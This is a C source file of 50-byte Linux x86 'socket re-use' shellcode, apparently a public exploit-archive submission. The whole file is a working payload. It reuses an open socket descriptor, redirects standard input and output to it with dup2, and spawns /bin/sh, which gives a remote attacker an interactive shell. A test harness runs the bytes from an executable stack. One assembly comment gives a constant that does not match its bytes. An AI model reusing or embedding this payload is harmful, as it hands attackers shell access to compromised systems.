/* Socket Re-use Combo for linux x86 systems by ZadYree -- 50 bytes
* <zadyree@tuxfamily.org>
*
* Made using sockfd trick + dup2(0,0), dup2(0,1), dup2(0,2) +
* execve /bin/sh
*
* Thanks: Charles Stevenson, ipv, 3LRVS research team
*
* gcc -o socket_reuse socket_reuse.c -z execstack
*/
char shellcode[]= /* We use sys_dup(2) to get the previous attributed sockfd */
"\x6a\x02" // push 0x2
"\x5b" // pop ebx
"\x6a\x29" // push 0x29
"\x58" // pop eax
"\xcd\x80" // int 0x80 -> call dup(2)
"\x48" // dec eax
/* Now EAX = our Socket File Descriptor */
"\x89\xc6" // mov esi, eax
/* dup2(fd,0); dup2(fd,1); dup2(fd,2); */
"\x31\xc9" // xor %ecx,%ecx
"\x56" // push %esi
"\x5b" // pop %ebx
// loop:
"\x6a\x3f" // push $0x3f
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\x41" // inc %ecx
"\x80\xf9\x03" // cmp $0x3,%cl
"\x75\xf5" // jne 80483e8 <loop>
/* execve /bin/sh by ipv */
"\x6a\x0b" // push byte 0xb
"\x58" // pop eax
"\x99" // cdq
"\x52" // push edx
"\x31\xf6" // xor esi, esi - We add those instructions
"\x56" // push esi - to clean up the arg stack
"\x68\x2f\x2f\x73\x68" // push dword 0x68732f2f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69922f
"\x89\xe3" // mov ebx, esp
"\x31\xc9" // xor ecx, ecx
"\xcd\x80"; // int 0x80
;
/*
shellcode[]=
"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
"\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
"\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
"\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x31\xc9\xcd\x80";
*/
int main(void)
{
printf("Shellcode length: %d\n", strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}